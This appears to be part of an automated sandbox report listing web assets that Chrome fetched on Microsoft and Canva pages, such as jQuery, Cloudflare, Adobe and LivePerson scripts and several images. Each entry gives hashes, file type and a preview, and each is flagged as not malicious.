                                                                                                                                                              Preview:<svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M13.333 11.334C13.333 10.2294 12.4376 9.33398 11.333 9.33398C10.2284 9.33398 9.33301 10.2294 9.33301 11.334V50.0006C9.33301 52.578 11.4223 54.6673 13.9997 54.6673H52.6663C53.7709 54.6673 54.6663 53.7719 54.6663 52.6673C54.6663 51.5627 53.7709 50.6673 52.6663 50.6673H13.9997C13.6315 50.6673 13.333 50.3688 13.333 50.0006V11.334ZM37.333 18.0007C37.333 16.8961 38.2284 16.0007 39.333 16.0007H52.6703C53.7748 16.0007 54.6702 16.8961 54.6703 18.0006L54.6704 31.3473C54.6704 32.4518 53.775 33.3473 52.6705 33.3473C51.5659 33.3473 50.6704 32.4519 50.6704 31.3473L50.6703 22.8251L36.7472 36.7482C35.9662 37.5292 34.6998 37.5292 33.9188 36.7482L28.6663 31.4957L20.0806 40.0815C19.2995 40.8626 18.0332 40.8626 17.2521 40.0815C16.4711 39.3005 16.4711 38.0342 17.2521 37.2531L27.2521 27.2531C28.0332 26.4721 29.2995 26.4721 30.0806 27.2531L35.333 32.5056L47.8379 20.0007H39.333C38.2284 20.0007 37.333 19.10
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (505)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1418
                                                                                                                                                              Entropy (8bit):5.418786110345074
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                                              SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                                              SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                                              SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):19948
                                                                                                                                                              Entropy (8bit):5.261902742187293
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                              SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                              SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                              SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                              Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1501
                                                                                                                                                              Entropy (8bit):7.518946990214807
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F96519F4A34C594F5ABF3CD4415A6AB2
                                                                                                                                                              SHA1:E0909EB808CCA1B009CC4002A32DF5A7BE618B79
                                                                                                                                                              SHA-256:9BE8E19E5A219F361AE85D42464EA3D19B68BB01A0C266A46882B9B6682EB5F3
                                                                                                                                                              SHA-512:DEBF66570BA714B31A234D058440833F0C9BE91D7896D3DB9D91DFC5C1875A0ADADB03DAC912D34DCBB260F7EE5867978558D1E2FD5710ED8DDF19236CDB2EDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_YT?scl=1
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.......?.@CA.2........b..9.I.Xn.....&..)bh.8..{(..5...t6.*.SD.J..$....K0[o....cK..|^C.K.-&..X.b4.5....G.8.D.."e...U.._..Z.j.v.../..}h.9.S.V.=....?.?.!.}.s2l.+.b.4J..?.........~E..O...%.G...F.s. ..`.....hY....Xr./.`..u,K.....m"..L..6N...x...$.BE.zGR..F.i7.a..]qKt....`....l.`..f?_P.%$.G...[oMs....I..Q<.A...a-......i...E.2.lh...:;.h.=...*S....6%...qgx..,..'.#5{"..z.V]^(....'...:./K*$.4.*.-..w.$j.q...Z.X..&.<..c.z.F?.*8...y.../.N.Z.km4..B....n.\.._..e.a+A. ..[uT..]W.*io...di-."o....(..../....o........94#.$.%..R.OW.e9...S.....W....P.4..D.......~i.6....^.......BK..m.\......~UL....X.wK....L%....).8a.....&.H!*S.p4...c..l..)..[.r.[..H....w.m*.rX..a..(X.i.....F...<....8Q.d.,0.....].8.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):101531
                                                                                                                                                              Entropy (8bit):5.387525433609782
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9ED70CDEBBE37493B0583CB014070256
                                                                                                                                                              SHA1:76627CE65F202AB54883959A7058A477FC5BAAF9
                                                                                                                                                              SHA-256:BA0B0A2C9484A96A99A2999DE9665200021F13BDD26B6AB97C38991007828A49
                                                                                                                                                              SHA-512:11112FC5C9C6B6A66421C7A573EA5AF0834D2C9614650DBB3D507BE60665B96F3AB3D12BD710D00281D7E1A8B897F10FEE6294343216DA812727E4F749137CC8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/6e6edc9904e8bf05.vendor.js
                                                                                                                                                              Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[8325],{576196:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},876055:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},19601:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"==typeof window?self:window,this.database=t,this.vd=e}Dd(){if("indexedDB"in this.parent)return this.parent.indexedDB}isSupported(){var t;try{if(null==this.Dd())return!1;{const e=null===(t=this.Dd())||void 0===t?void 0:t.open("Braze IndexedDB Support Test");if(e&&(e.onupgradeneeded=()=
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (7794), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7794
                                                                                                                                                              Entropy (8bit):5.350716681959343
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A5A510020CA1FD908E6ED09D25998FAB
                                                                                                                                                              SHA1:214FCE1D3C10D68E3EC4701063E70F35FD582F98
                                                                                                                                                              SHA-256:7FCBC5D3C3265E7038E929C1CFF2495764DD435C770852863EB46B9791C49524
                                                                                                                                                              SHA-512:2E58053C2EE3192EB165B18F9ABFBD0C9D024707E0C2394FDFD8B49B543B55A0D2DC90A7FFAE43D3B7FDFB48AB604E05AB2F882F6937327F7D1BB2300D794BC3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag.taglets.SurveyLogic=lpTag.taglets.SurveyLogic||function(e){if(!e.survey||"object"!=typeof e.survey||this===window)return!1;this.survey=e.survey.survey||e.survey;this.createQuestionsMap();this.defaultSelectValue=e.defaultSelectValue||"";this.header=this.survey.header||""};!function(e){var t="prototype";e[t].questionTypes={TEXTF:"Text Field",TEXT:"Text Area",SELECT:"Dropdown Box",RADIO:"Radio Button",RADIOH:"Radio Button (side by side)",CHECKBOX:"Checkbox",CSAT:"CSAT"};e[t].validationTypes={EMAIL:"email",NUMBER:"numeric",STRING:"alpha_numeric",CSAT:"csat",PHONE:"phoneNumber"};e[t].errorTypes={EMAIL:"email",NUMBER:"numeric",ILLEGAL_CHARS:"illegal_chars",REQUIRED:"required",CSAT_RANGE:"csat_range",LENGTH:"length",PHONE:"phoneNumber"};e[t].questionsText={MAX_LENGTH:2e3};e[t].csatRange={lowest:0,highest:5};e[t].getAllQuestions=function(){return this.survey&&this.survey.questions&&this.survey.questions.question&&this.survey.q
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):124314
                                                                                                                                                              Entropy (8bit):7.997425925037599
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5395C82DE2CA30029762C066900FC4F9
                                                                                                                                                              SHA1:38116A3D1BC02AD7DAACD71E02D9D216759EC2EB
                                                                                                                                                              SHA-256:2C541BD69F9061D4A57326DC8DD03BDDAAFCC107F2795DEF4CF3A34FF3FEE0DD
                                                                                                                                                              SHA-512:F42931B28FEA6C11DD1E0BB046B0F9D6F017A2F0CDF8CDC1DEA4E33FDC7E9DDA4F1D7DC99D191CBEA39592539E8F4C246D6E1241B8DB12BAEC9BEC45CD07F4AA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*..&....%......3..m.....s.............W..@.e...d.{(;[i...........}A|..M.C...?.....?........}...? .?.^..........N....7.........=.....W.....>..l}.?H?..G.x.....g....=.}@z....w.....?.7...._.?................O.... ....=g...7...../..n>+./...o.?..{_.O..#...G.w._.?....K.K........W.W.?.........?.?......y.........?..I.....7./...?..p.......o..e>....W.w................%...G...O...~.}.._.o.z?9...G.W.w......?....}...../.?..h............W.........+...o..?..c.g.g.s........z...........s.....?.....@.....e.{.?.......}...}..u...............?....<i.Li.Li.Li.Li.IV..........B.B}.$..}Z~Npgn;...r.......Y......@+.bh+8R...3N#er.&b.`vk.z8:9..L/.l.......A7_.%._p.$NU..^R5.7....4.&4.&4.&4.&2..Y..f.s......C.........jF.......8\.1{}..oD..<..^...?.W...!.]J..R.h]!...*=.V.!gi%.m\=.ZT..2$S.ON.|..M.cM.cM.cM....(.+.M3|.bO!...)=..b...msa....+.L...^.w...L.....rVQ.*.......~`q. .j_./.........z...u...O.....b.&4.&4.&4.&4.&4.f.B..2@&b.d..i...CR.F..L3..nO.. .M.`..j.WV.{
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (908)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1055
                                                                                                                                                              Entropy (8bit):5.25750511108487
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:116C631363F35F203A89723B520DFFA7
                                                                                                                                                              SHA1:D3B7EDE48A614B369C595C7058E3C3EF1BB72871
                                                                                                                                                              SHA-256:D19D3F7AEF17B502EFCAC961D1EFBF1C37220B97E70B6E87E2F44EB4A2BC4D20
                                                                                                                                                              SHA-512:0C1D9FE25802432CDE2DB7FD0E7DA7B2195411302555B40E2A5DAA01687C9A46F76B72CAFB7067B857D15DCA926FF4BC2B0B62D2C609D996000E65948243AED8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCe273b42c34d5427cb02b2d6cd022cac2-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCe273b42c34d5427cb02b2d6cd022cac2-source.min.js', "window.utag_cfg_ovrd=window.utag_cfg_ovrd||{},window.utag_cfg_ovrd.nocookie=!0,window.utf_event=function(){},utf_event.listen=function(e,n){document.addEventListener?document.addEventListener(e,n,!1):document.documentElement.attachEvent(\"onpropertychange\",(function(t){t.propertyName===e&&n()}))},utf_event.trigger=function(e){if(document.createEvent){var n=document.createEvent(\"Event\");n.initEvent(e,!0,!0),document.dispatchEvent(n)}else document.documentElement[e]++},window.requireEUCompliance=function(e){window.oa.tagging.data.store.get(\"haveEUConsent\")&&e()},window.waitForUTF=function(e,n){window.utfLoaded?n?window.requireEUCompliance(e):e():utf_event&&utf_event.listen(\"frameworkLoaded\",
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):151204
                                                                                                                                                              Entropy (8bit):7.998209133888531
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B2A2C79AAD430913A117FFE3A5A7D96F
                                                                                                                                                              SHA1:91028BAC03A1B6CE44CCB43ED21D8BC947CA58CF
                                                                                                                                                              SHA-256:C32C51EFA044CB65F47D56E6AB85028E2FD537E5F8DA7FED4DB741804507E11F
                                                                                                                                                              SHA-512:D5117D6D628E925F7CDAD0181D5097292B03E62EF12CEDDB039DDF6B036BA35A6B2F53C881D99170D5F3A3FE58B24CF6C9A51127A632A40A0D7EED3BA13780F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.N..WEBPVP8 .N.......*..&.>...A..Nq3..a,.......{..H.a.{.Y.......)..........b}/......&../....W~........o.O..^E...."......._........w.W........'..G.~..{.o..._.?......_........}...P.......7.....?.o...........o..._...h...c.7....................o...?...~.....................Y.m.I...............?.~k}..!.....3...G............k....w.....?....y.....?.?..i..............`.....r.L..~.~....g.....?..R.E._............./..y.....?.?..}......................T......................_....p.....O./..._...9...G...o....~......T.........._K.?.K.../.........O...\.r~c.g...O.....~....?.K...................c.|.k...?......_...q.).g..............[.......8.]..................W.O........r.....o.O..O._.?..E_...h?.~....\vYU/...P.w.*A.*]...w,.f.....B.0sS...1..l.Md....4.....u..."o..'L#0....g...Qq3......b.R.*o@.*A.*].y%..|..IA&QSub.L.[..._.v..Fo.A..d..z....K.z.KM...t..v.S..=.{..}Y:|...L...da..w.*A.*].y%..|L*.p..X..N.f..>..N.4....-.N...ef.s=..\.\.5.:....v.j....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):4565
                                                                                                                                                              Entropy (8bit):7.879534543139402
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                                              SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                                              SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                                              SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/UHFbanner-MSlogo?fmt=png-alpha&bfc=off&qlt=100,1"
                                                                                                                                                              Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):182092
                                                                                                                                                              Entropy (8bit):7.998671626179769
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E42B4194C42F432D5E1483FEBDAA2A60
                                                                                                                                                              SHA1:1C95B39B89CC2FCCF281E4128D89C6A876B25352
                                                                                                                                                              SHA-256:3F61F666EF1A7D670D57C4CEDCEB03651DD791554C10945A6C6D2A2553DDB7C9
                                                                                                                                                              SHA-512:F13D4A712E4FE9EA5767EC9A1EC499F2698879E4F7867BF918E0402E9AAF4F2A4873FD9CE9C372AAE3E08AAF5934300F380A4F729F38FCDEF727DD1FF0972458
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_FreeAccount_6.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............V.....................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe...........&....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................mdat.....*..%.P2.....$@.. ...,z.B....7.t4...!..7......1..V...~....1.....| .n......-...*.#sx..UT....p5.3.s.y.m.....T&....f.......f..0.:..d..:.A.X./q.)FK.9....L6..i.E.....*..%....B2..D.........4pS=*.[jJ2.......g.q...<.!|[HR|a.u..X.1.R.]..0.3..v!......D.e.:`P..i.p..v.n..xA"_.......R>E...A...US.^^.>......T..WyZ]..l.......2OZRRg.....Uew!.........X9L..&~.]>*.L.j..$#..a......k{.......".....F,....{.W).d..bR....4.[P.......w5G..-..+.3....d.H.GYG..)...z.\k..M]..d.*...\.k[3&....+upy..<.tVa.8....D.WL....s`-U..-G.0}h....f...2e.V..Z.,U..%..Mo.w.....1.3?.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65302)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):304858
                                                                                                                                                              Entropy (8bit):5.098842090973851
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:561C834597FB9BC5AAC4021E21E006BE
                                                                                                                                                              SHA1:C535802C0C6171B4BE1A776034C330418B36983D
                                                                                                                                                              SHA-256:D8BAB22B1506E8444C64D92431F521964F658C380F5D32738AFEA85C15F03013
                                                                                                                                                              SHA-512:748BFA3F917C8E75699A52FFE0AB2F753262D1B73810ACF68523930B665EF10A85329BD63A2A7B39746154554EA7A195270D1326C98C77DE72F75E4EB14CBB2F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH561c834597fb9bc5aac4021e21e006be.css
                                                                                                                                                              Preview:@charset "UTF-8";/*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */@font-face{font-family:MWF-FLUENT-ICONS;src:url(resources/fonts/MWFFluentIcons.woff2) format("woff2"),url(resources/fonts/MWFFluentIcons.woff) format("woff"),url(resources/fonts/MWFFluentIcons.ttf) format("truetype")}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("ttf");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-euro
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (541)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3642
                                                                                                                                                              Entropy (8bit):5.399452635270733
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                                              SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                                              SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                                              SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):229070
                                                                                                                                                              Entropy (8bit):7.998952230935271
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:837DFF6B2FB5BE4C1381CCF936E5D8C4
                                                                                                                                                              SHA1:049B6F333717637BED0BB92A59CF64F413816505
                                                                                                                                                              SHA-256:3C7D98869DD2BA31F498E0B91F2B3573D7887E5FA28CEBB5C73AEEE4353AEF70
                                                                                                                                                              SHA-512:B98C071FA75A837EB622E476DFFCEB048D585BB77815E01BF7405FCE37EF5AF1922AB9CA76AE42A848C5FF912A0C319F5A5F87BF0BE479FDCA15EAE853C072EE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_FreeAccount_6.3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=99&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............-..{..............d...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe...........&....pixi............av1C........colrnclx...........ispe...........&....pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma........................}.mdat.....*..%.P2......@...u..4.<.Orx.V3j.....P........QJ..\.?P..UO.pI<l..5U..J........yV-.UT....W...v..UJ..!..+.T6.}1.%..5t=.n|...c.......l.*.uU5...j.*.95...UU.C.3.r<?./..q..4-.X{?....q....i...,j......*.=_...Q......(.3..k.Q..:.OU%...Ij.o..Xp.E...=.SK..4...|r....L...=Q.E.U8......i..-..MzE...<91......<..@.xV...Z)e.w!b..r(sC...&....]$.8.!...0...>......*..%..B2............$uf.5.......4(.e...0..N...k....g].D..Kte.`..:~...?.'.fSO..C.0.G<............HA..H...;....E.7.Bo9.....9..?#.k../$x..</<...I...Gq.p...1.m.+..,G......^R...%.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65471)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):4004963
                                                                                                                                                              Entropy (8bit):5.608526137357891
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                                                                                                              SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                                                                                                              SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                                                                                                              SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn.botframework.com/botframework-webchat/latest/webchat.js
